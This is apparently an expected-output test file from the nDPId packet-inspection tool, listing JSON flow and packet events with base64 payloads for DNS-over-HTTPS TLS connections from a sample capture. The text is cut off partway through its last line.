00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739311703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739311703,"pkt":"REREREREZmZmZmZmCABFAAFIvxBAAL0GjQMKAAABMw980MyiAbu+o\/fohj5JlVAYAfZx1gAAFgMBARsBAAEXAwOEmak1ToTEOPVX0jBh7rLNZM1Gt5\/Gr6ZvrmdHklieHSAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zbmwuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIGzt4\/5xvtyifU6VTcrfvT+YrIEhagkzRKKKlOYdvDd6"}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946739311732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311732,"pkt":"ZmZmZmZmRERERERECABFAAuAX8dAADUGahUzD3zQCgAAAQG7zKKGPkmVvqP5CFAQAIN8DgAAFgMDAHoCAAB2AwNcTBj+nowDUUbglTTLuZi3m0Fgte272n9LPifxOMv7HCAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4BMBAAAuADMAJAAdACCPdFwMNjRtfUXHati0iPvUS7ZISUYNc1KeHBUbO8YTWwArAAIDBBQDAwABARcDAwte+JJAD4P7EW1qK\/KMQB2haaLigWKb\/DYNFwlVC4RO51bq0M8eao6QlrOrDJOFceHVJKhl1p8Ibfrg\/vTRNCJB\/UcW+Fedt+hD1iuUDwTCFZavOS7xwPDkL6497l\/MLuLG4DXgnGeZQ+ANIJd3qmkp82hmnma4vPPfih3FXm2d\/orPnXJKqjQROYWvMcbtvj9Ebb\/txBSHxVMCrKgG408ySWMQj9wSJ3YFhq0yzQL4\/vZaLuRC+Soen8TCR9PMAvnOESL67SWkKNvrhHs7A8wve1+FS4QJZG0DVnfyZjC1lTDakOFEVj8uyQCDIeUSTCCRymHyRKKDInznJ9K1ylbbeIGdenKpQOC\/PvdDSl7uxqaByB3NSIma+imeWtGfSsSVz2bgzfRCO+1shU4LOWr+fJj4VfVm44ziFmXpQXba4f4sLTdWNOjDqe5hsphKeTPq6cjwHY\/8d4YQO1mASNyJu5PHaom1vL8or5mJSUE6nK9PPUFEoI+arXXrdILbrGh6AFzUXQGBrrAdekMh3lpPbuWJTMnyJ+tNhczzi4OaeErbR+eZBtyO483ig0A5ofFGX3QqSY+x\/jYa34H7RpPgi7E73Kv3qvag06VhkcjqWXPokFDtuDpOCx1sHam7i\/mBXaEeSIMn\/6ibfBibK8Ssyhd351G+u7nIG\/kPMrFG9dX2lYQXotCoRmApyZWnnIvnb1Ems9MFs1nWg90WJfHxHinrSdpjBeU8iAbpS\/jrwrYxGk3gVDAv9VGAkZlRz60RiJgOn74olT+JGbdB87Dmd8zXzGHRAs6xX1wLyFHdLBSPxN+wXikNtBamIrek5su\/OhIPfJ9Db8D4NRmo2RQxqPr7fuFEkduV14PFpTKUsiEOkhDJwNg8LiATZ7RVwMg6yMpsydYcgvfMea751TpJNvE95FINDC3Rb\/\/f0HmE4sSUBcBPMBavqAtQ7YhyYupjzYKChAX9lCvR4V0MA3gDeswYrL6CJ2QWYyZ1X5kp+MoOy0A6lbwTY6FAqgtyYhKr1esD7uta6z13oZTeC8zVTDF3SZq3we2RpHyfhsBTKY94xuStpqoHpzXuf67EN9Ci9BXk7ctHV6chPXxbzfNbfHejhQSWblCUVsEWcGJTaWPfYy8Qk91uEWvknUwg3\/gnkTaxOpg74KZR+eQhsLtgXu83uRIpmos4uiAQqNFCr46gFv66IhjUaLn++05xvOtQF+pJff5ceYA3+HVtzS7siCW14iQ0F2g+nmUdK\/l5e2iBJ9jUDVjX1gbsI6q3sWAVlaZSWaqGUPI7tEUJQO+uLheM+t5WJ2hIuHlBrb7V9x7oPe\/w4Jyh22GAaILXTviEQ++5bF7t0H5J22\/uU82cBtUmtPnPK980jnCJpoWHcd5b8NrM+3vBCp31WdecAix\/bw5hrhpdYb3Wuo00LpEwMw5n1XbAIEscw8D\/TDkT3R8DdqFFvsOwEJgVupjA7F1prq8T49hiTkdYl+giz2p0Ayt4KR\/SKb+oWG3y4ZtrykubZr+Qfc18G7yRy1UzXXJ7wFTK5WhTLREjxeCpH6IaQ2zDQ5+I3brP682k2XRTd3nMiVhZaMNZjB3MO3yAICh5zK9ucc+onrCYJIYI\/CtjBj1mJ\/oiWvsTssUIxMNevGNJc8s34PU+GVpiWU7G1gOq2\/oHbQNmNjM6utdbIKFu2BrwDIIIyRNAnfbb8mkTirEZY8JOBVWtUMwNF2wWG\/znmaTdvsV5XVYinNGBvCLJ4cl4jpIhiQHJif7TdKLHCM1mnqE7oXlP0MjNOI8YrXpYFJApJqV+nQMhEAl320hWRRZS9jvtYuADMZM\/zqsrhOwTRUYvn5TUWPPSLkDCWWQT\/boP1Zrm7ipJ29gjQr5TspKmpn4J6SGBQtqSqLcPrjFY1FGqzT0Cxa7I4qGdQmb7BlBoZsZba4XtkUxqQDb7GQ7lF9QZ8stU169sKy3x8YQd1brzqNHrkIJDSvbZZhCJGpijHPtgp\/QG6Dw2\/BImDmY1tBmkVrEm\/bZ+xumAD64t1fYO7WaWjuGbU0Y+9l0+9zDoVeHa476WXFF01qNlSxZZAxFkrGmva65Ha2zNip3N87qP3nyH+3kbjqzMKrpNdw3pOcpWv+PdRxpJZGkBM4aT6LXbJdAxBLLkkepjX3bVMWm9bedod1MvUUZQHAIRVofMSy8iwjG593htNanCQUBVZUhdnlVrmQD4OR5EjaE0aFJSUsVHU2VO9DX1cb2EnPoiZIzX378PPrzLoeda6yE90ZvWYSJeMUQJgjFljjq1Vmv7zPz+m4Us7Q\/oFgLEuTkw4eq\/OB+aA8STNn4AHoTw1B57\/koj\/Tsd4yxadruMqmxj8G0neUx2FN2AmiTBa4RjoLGNzELD8QTXTHG2\/lxfzCVwHvLq9JxQf3uprD59F8Loph7ycBJ+j\/BoYH+iVGt+6GzZ563iyu9UeY0+AiljVO0GFvxbuhFk79OBcmYfgnlTvugErVv1eoGzzwF3KK3N67S4ysk\/cJIT\/DoRZvga\/lMRKstxDLEaDolPIBoEiu4mAsdPBxa5KjB\/uaPK\/Gvldfb7QWo\/hvHLZAM3qCGVxLZ4OSPZzTuJ4fJWIQaOXTrFJVv4TYo67KpO9uvbnZUtP8hCVop9O2qXs\/NKl69+XIEhMfw1KYOxJAcgDxH4xjWm9TWAA+DhZvFs31qLGWSu3CzrM+geUCeE\/Vlrc8pmCZFikrptNtJl0uwOfLeuZUF7VWjDr6R5HxdwbmReRnk8DeQUb8\/JzwIyCR78O7TDjY2uL4IEBoTWwTpLR+tDFV4fNsyzL4VzpHaIwnMWTyomGHXhNDLAvBXN5lZAH1nY9D82KvJ+P8HK2FgOErfXrK6gPfonD48R1bCJofrjuMQkEZVQBGqn5ypZTPRu6EwnkBn4q0ARPtqm0QEoQ1VuhulmyIu4zwbE+pgZlGBWhO+4WIy2SuF0h7yFf\/0cbwCehkDSsGDVM9QRwmW02sBUez1\/0Ml7N8nkc2bCsJgo\/fEUXj1TOn7cIchmlzf+MvAjyYfcGhECzHaENxMQIFKZWAib9UAuoVCbRMTYEaO8+NZKwO6bZTHvUzm+gaaUre7sgcCCP\/wfz0OXBRWwpNRR4m\/LwYXSYWMMhKP7tqCCj6OXjzq62VPsWFinT4KE+SZYXF5y6EZay9KdRh4kW7ybiZ7hqI6uqO0\/mKAHQ\/xlXAuQ2EOnYG47KeZUkoht4zFh4Q7AcG7Q0FtDwRhJqM+GVySAg9IbIymkvgNTTZyOY3isJHVYzmKvFAgPib7ERkwsvRQ\/S8lGEoG+lZogb0KK4PyuRpdocXBa4Io1guVhX2K44\/qHOYqiQPL\/Vb5wtdOiDpag22zTziquJAPx3Cc98vOxAd33lx77fZMHNMz95phNb\/gH\/oBI60jIQ5icFLLZs+m7nP7\/6KXDZlQEY8H6HyN8CbMnqheODed7gRjDQsbXi9MHr27blhbJLCz\/qn8J0uletyL+6GpmTu9W1AZiLdNt26PN\/1uozWEq9dfJLpT7KZnW6S0qvTBGlR4kX8O3fku9pK2qyz9s7t7Ockp7sMMWorJbLnKYK0PgDcQi4HUA+VDHi2RlLA\/XZ9u3fGBeP6zmmrFeEhRc6glZV1JpHMW35YHtgDMlMPiXVu6VYVSboWqwuvKzMobkKuX8tZFxZtF8Qlpv25zGgKwz"}
00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946739311734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739311734,"pkt":"ZmZmZmZmRERERERECABFAAC4X8lAADUGdNszD3zQCgAAAQG7zKKGPlTtvqP5CFAYAIMEyQAAeS0tOv0CsE56CKvTlOFyTsi\/xDWjEiSHZ06cNkY05jGBZ0BY+\/8ar9VauCfvuAhmfbkHRsufSt9+BCdWOZTLG2pLv7Rqy1KMbXDj1dE3FFg5TtH6GqR+kavc+JEGFEgehaZ\/FbuVi\/sk8mhzGqOKXx4crPRKN7mN3k61duL6EtdmqASfaRcWFkjwmH\/5s907"}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739312203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739312203,"pkt":"REREREREZmZmZmZmCABFAAFEaI9AAL0GaqQKAAABdMuz+KL4AbtonCHmRxNJVFAYAfbqtgAAFgMBARcBAAETAwNLJ0LoKZs0jG4db6SH737y8naHXDM3S+mAdGRoYzSPaSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOcnVtcGVsc2VwcC5vcmcABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg33Waic8Yfh0yJ5buIXWM7xt29S4VxDeDA2qvuzRytkE="}
00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946739312226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6JAADYGLgJ0y7P4CgAAAQG7ovhHE0lUaJwjAlAQAfWSIAAAFgMDAHoCAAB2AwPlxRfYXMEhZdQ8ajfb6CRVs1xCMiaZqVFxrCKnBSpfMSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFxMBAAAuACsAAgMEADMAJAAdACC7U5tcN1lyGmU4zwJoCO50vCXYPM\/QvTMxioFdnZMwahQDAwABARcDAwAgWYRxXowUwkrzaVinqnzWcQ+TBbMUOwCXts50ql211fAXAwMLXdNQugGPXsJ\/8C6qtHlVybUGs7I40LMTA5OhGA+5YDHeNrEuEhv+tu5lin4eHBImQq4kbeHEAo3aNZo3KmURuDQDW8qwTnUEVfBOev0Cp\/PjSdjbD78ol0y5nY2oRm2fbsKHJzJSSjb0AciAo1LrQOgCF2CvMV+eyOyHUYct\/0CZzYMkLxKZwgRjyAJuXMfA4yEKZGM2df01\/BUbSo1Rl+1vGFFUkgKmIgKkRy+Bl\/5\/aUS0H7x+NZdUl10aLbTaEzyxHvC5FKjKyKio8Nq1FnOONx6t6a1NxwFwus79kTDzOhi2RBBAptjB5bREXvI7I78ofmPnYWckOqrJFFwvKuiJMXscIR8meUqP2LfgWzMDMhsH4p0jN+l3Gq+FBdoxKNoG26O484i0pfOfynG5VCfFmeEmq9XB2jrTV2FwEB1w6FHC1GMZVEK60qV4O+pPgrZRJMZSzwllOfjef8V42EZAcff6ioa4KXyU2Lg36HO0yhYzbeNUU3pAi5\/qwo\/8uuPNfVbKx0eipCjwx5+0hZa74DG\/pD0GzntSqS7YWEdlhEup1mtZmQo0eaDjwGNrCt+ZhJgQy3V2hPBCa6ygW9VMF25ycsILPfVx1AuqPxUOHW4j094S0MBQegEN0J3yWeWaiiBlzmaP9zyQI2IatrzAzhNsYChDHK+csfeO9ThoioAfgwS3AljMljsUX8LckrIXpurphG9MTttyGcbyuYOZgMBCh0hvfGempBEWQ87aRGnYict7DJMJ4ANT6I8mIRYfs9ktyEUtlVvr4PQNKARgob1jc7dcCzVhF1wheYyQGYeS88ndMehrocaatcfPAW+sGsd\/PlwCwZjCKZRZc+RY8UIBMVVQFkJfKmd3vMc6ZdNW+eECwipaKd\/GGSBQQLLSZMZlc2\/fq5kgX+ANS93WhwsRG1d13Nrw0y\/ATREqmOdYnxg9NReWvH6Y9oKaWK0ORmDf6ge12lS9oVHWz42D+xzkGejOSsWciqHXAH+yg6krTEDYRK\/FPbGud1EfOntNRDB8fuTqg6A3gnOVkf5Fe+6Udnrmytaz7VKwjYRLdi7vz2qagJMVcAAVeEuovh5FOb\/1EXijxsxUB7j\/jcKgZC3AwFJv0DQSdWi57X+9030WJdNzGWfONsJDey166z5gtgIr0gWE3XSAHs3+JszFzgP3FC9xVilACKjY2RhRQyvT6fGwve0GSnMhLdXxdeZ6r4BSk1XrmYwxLzeXAWqaNfsfk0zirnPcN6UG26k3lnJ6hvodPS8WtfbDlmo8y38gK+0yMKaENYnpsWQ48t8ZDpKCeCokx5kJ4EaYicnC8gtp5emEtPLOmyhRS\/Kx67Xu26y0PrFyj7Ld8XnP+XpwQqAHuqyPPLcA7ULfoMWkppyHnn9L21Mz+6Ml1h7gnl\/ZwxToT4wqDJUExA47\/9+7Gr\/oh5kj8z6qG0LWqBHYWfEqQZ9C6c64n2xAiBIjVtW2HmMJDocq5nLsWLSEY96ngephvH\/r2i4gA320QycCOlUbe7IShXjhfHajvNFk9aT9mVr+xKfGAIJr4upUShXmjRDRgxjZ9A2ryxbqx35tiU7DJrZpjO\/5DMzEBxvVggb2jlqmTLhZH4TtJi6zfeCLrUu+11tfn0GJzj4HRmOyvzdz8MwTSgWBVisogZKhAqzzkq5ai5YnEcmNOW52YkN74XGWlccUSq2JFZXF"}
00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":946739312226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6NAADYGLgF0y7P4CgAAAQG7ovhHE08AaJwjAlAYAfWhygAAp6lKTcn83BQxpQ2W+POQkJxpRZXfacCT49dCzRTmvnt7\/eMDX1qsnmxcn8IW\/\/jaiVs0n6JrCEPqM3KpB310Ezncm8MGw7ZSfjBA5NhRsYZd6g\/lnjS76Li5236Ye\/OssNOz\/mjZ3Pxtb9lckb\/iUUI\/CTV\/O+8693wmOcz\/ttlVvcsf2F2cDnHv69Z9ZcBThvWSK1Fyp8msppNqA2rjumUxHY0NG8Y6Cz7YUFXsrxgVnCyIlXLFSqfPySagEMAo+BwG8r0qoeYlZ+taxtjBF+CPFNBs5wvSzuudNsLZAlsoLeVbC7V4nVAvK0ZozwjUaQXydZ7If0bf1gWwEwbOWvwXqAGoH05iR0Faj+nrSPK0l15jvP1ksCKE\/mIp4VHggNWOkJSAoQLhJ7eDNcolNe3VlYAesuTAoWHjzA4h2mXXEBGcexNswvAECexp5rG8zj4HDx39qgDVWk3o0eoSeBD1Uedt57E3iKOheQuYjuGPkNLW\/CT1EKc1xsQFJaPuXeJntSsuTJIbn\/JmjGMrhs2EpgTuc4i6KbgNr+Dg8naPJNChEcAoURckVZ0QP1tlwwQ3au79pUNst+WdCcPkSU8h2p+dgHNltfLpGpzxtjAkiMDwJHlE7uKJfM3Jooj+j8pbChIDWDckUBPBe4tCMPlI9VbP7p8jHCN+Jbgx\/vlzb\/jhrZ3VmwNp1ed4spIYgJkRtqvwQ8Z+wh5eYA\/rsAfAyJTWCHM70B9AefRgCTo9QDWJRLYx1cy2\/Boia47DDoYb3uBS7QfII4eh4Kp0F4K7dkOLwQWThipleT\/tvJB91q4YO69guoqAikyr2u0R4I\/dsfO61jRS\/0OGcoHRfzyYT6Gw0389lH9EFy84qx0Src85OaD1tRwt6pfR9awywt5CBZe04hE0tSwRbw55PNLODVlESQS0e66OA\/M16o1ABO7aMZrc1JmwD6a7e6weEeFmAazedN8hZmlYv1tms5VSBekoNgGF0CPdRNH7+BWQQ\/oy6wbYcn9T8DbY3EESV3ngHV5p7hWwxUALrbhEOn\/rgSRIuWBulfZWiwjpGLHCmd25Lp9PvWu2ARh3jmQWx3LqaLBWQZ2RO9BztLQCxX\/fKF1FJ2Nxx5CvAx1deQyJI3ILd0FX\/RREt+JafDB83Cz6gQe6DiXexfTUxaiReu6RStMeEaz6P71JkxtuCl0MQOV+trcnTBAsrOiC0Pnp41ddFZ9LyjPw5Mwgkq5S8GDPbsUHU26OG2nr4C2Qc8pral7heokrRYgBHlPnskyAlkCxuL+0XPLYLPIRRcJ64nRekoDw2yg6gDPsz4RcMVRLhEiIfkrCTlBJmmDuRqLpZJpecdlBmRfFHNMXGB8i+H\/\/tNPFLdJAZryXO\/8h5nkH4Mq7yLQ6vkIR62sgbVPD0Qe836LfCEQO\/hxA9iWtbqSJ07ScNvoG2Czrtvhfwq400gs5KtFeBbk1AFnMyczsxPdl6tp142MbR3VLQmj78nlxilK51hORcVLi9ktXxGEonuDfod4vDjaA3pJ\/0ADkZjstpvA2GHymd+GbXXXQzsOxrlPNaHDKM7gA5XeYsGBeDXesqay1VJZXsBwjzKmLHBEfMmuTQkRGywy3RBFrIumMzi24aTghRx9FA\/ZPDZtgNyArr3TSzkQB\/WYB0FDxqBDH7pfBnH8cJXOSx4GfComMuGBhw8lB8S7RS+Tun6aoozaQ7NOXFkWLUNwlMATJg\/u88xBUir9H293nJp613ia6G8KaLtsNZhb97810Q6p5rpfzJ8sEbxPvnOBsJoN2uNaptS39DLNaJ78nP1N\/6JenLJUIebOzoNXR4wfNgVp5Coyyjw8dfCFDyuNA5Oi18AcVmGaGj7TK82vR9gQ2IWuTm0sTMl0T1RNelk87ZLC7oqgqi01091WCo6H3\/T5HgzDHHgrz3hvSk8s9"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739317842,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739317842,"pkt":"REREREREZmZmZmZmCABFAAFDy\/NAAL0GDsoKAAABwx5eHOp6AbvJsoUZMUH8QlAYAfbjLAAAFgMBARYBAAESAwOCYT7eCU1xUXbhTPV2JlKPIHcY7sPH2WwKtpwnSeF8xyAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmZmbXVjLm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAw+TAbBBMqcOYtJZmoA1qcBE16Yt0ym3XOBLcMkrVpDQ=="}
00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04399{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739317868,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739317868,"pkt":"ZmZmZmZmRERERERECABFAAuAyWFAADgGjB\/DHl4cCgAAAQG76noxQfxCybKGNFAQAfXtaQAAFgMDAHoCAAB2AwNkyl8ogzMlAhTUQA2TsMh7Q0Cc2\/3wZHCiwad1Z9NoaCAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9BMCAAAuACsAAgMEADMAJAAdACD+8H0HbVGEEmZC5hZLdNizcuC\/0pRP3fgeIP4D\/GwhdRQDAwABARcDAwAkfwnuX6wEOZOBUTjar1eVwNX\/5E0Ocx7Di9qIEnerial2sCiHFwMDDDWV4W2nvLW+\/N2l4x6sJgc8wiYdu5HOhM21Gm3mnFcxKO2Ie6ZC8TBNY2Mpp7Yb5rcL6bqv3cZKl4w3lzpNGDKGTjZnaTdTckz2Zj9T\/bsrBq0FYycXELwNiLo2fX1zTKtRPyLUu0GGauan4AQwcaDjRQzNlNJGd6461bdar1412MhrLksAOF3Zz32PJXTXtFU1mwvYVqphcZDb4pPZ0N+gjj7dNR4S3YwPGEbwlcx1UcGfiv3pyH+UUZNMH5Baw9z+5KY9RTPE3Rfw1bhKsm9xadHFb6suVuYDZzfowFS+\/J7rFZVNyczZA\/78zcdYuuXbTxeDjPhOqxAoQDX7VF1HojbcFFzFMGuyikHPdDYckD+WeR5lbhzc\/IDh75MNMf\/KMikRmHFGsWSPgCfnHcJinGKvxJJW58RraOB\/5irkT41Kj2mTP7rHD5SNd2CjxOxspgfL21g9EgRySSvXC+1MOm